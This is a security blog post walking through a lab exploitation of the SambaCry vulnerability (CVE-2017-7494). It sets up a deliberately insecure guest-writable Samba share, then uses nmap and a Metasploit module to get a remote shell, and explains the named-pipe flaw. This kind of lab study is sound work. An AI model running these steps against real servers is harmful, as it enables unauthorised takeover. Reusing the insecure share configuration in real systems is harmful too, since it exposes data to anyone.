SambaCry RCE Exploit | Lucideus Research


Introduction

Samba in 4.5.9 version and before that is vulnerable to a remote code execution vulnerability named SambaCry. CVE-2017-7494 allows remote authenticated users to upload a shared library to a writable shared folder, and perform code execution attacks to take control of servers that host vulnerable Samba services.
Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.
Setup Server on Kali Linux 2.0 (2015)
Steps for Server Configuration:
  • Check Samba Version
    smbd -V

  • Locate Samba Configuration File
    locate smb.conf
  • Create a SMB Share directory
    mkdir /root/smbshare
  • Give full permission to the folder created above
    chmod 777 /root/smbshare
  • Edit smb.conf to create a network share
    nano /PATH/smb.conf
  • Add these lines at the bottom to create SMB Share
    nt pipe support = yes
    [smbshare]
    comment = SMB_SHARE
    path = /root/smbshare
    browseable = yes
    writable = yes
    guest ok = yes
    Save smb.conf
  • Start or Restart SMBD/NMBD Service
    service smbd start
    service nmbd start
    service smbd restart
  • Check SMBD Service Status
    service smbd status


On Attacking Machine
  • Run nmap scan on victim IP
    nmap -sS -sV -sC IP
  • Check if victim is using vulnerable version of Samba
  • Start Metasploit-Framework
    msfconsole
  • Use is_known_pipename() module
    use exploit/linux/samba/is_known_pipename
  • Set RHOST victim_IP
    set RHOST victim_IP
  • Exploit
  • Exploit is successful and we get an interactive shell

Vulnerability
Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.


InterProcess Communication
Interprocess communication (IPC) refers to the mechanisms an operating system provides to allow the processes to manage shared data. Typically, applications can use IPC, categorized as clients and servers, where the client requests data and the server responds to client requests.


Named Pipes
A named pipe is an extension to the traditional pipe concept on Unix and Unix-like systems, and is one of the methods of Interprocess Communication (IPC). The concept is also found in Microsoft Windows. A traditional pipe is "unnamed" and lasts only as long as the process. A named pipe, however, can last as long as the system is up, beyond the life of the process.


SMBD
SMBD is the server daemon that provides file sharing and printing services to Windows clients. The server provides filespace and printer services to clients using the SMB (or CIFS) protocol.


Microsoft Remote Procedure Call
Microsoft Remote Procedure Call (RPC) is a powerful technology for creating distributed client/server programs. RPC is an interprocess communication technique that allows client and server software to communicate.


MSRPC protocol allows to connect to a named pipe from remote destination. When trying to open a pipe using MSRPC on Samba, the server verifies the validity of the pipe name using the internal function is_known_pipename().


An external RPC server can be set using the ‘rpc_server’ variable inside smb.conf and then it will handle the pipe request.


The function is_known_pipename() doesn’t check that the pipe is valid, this allows to use ‘/’ to insert a full path of an arbitrary library.



No comments:

Powered by Blogger.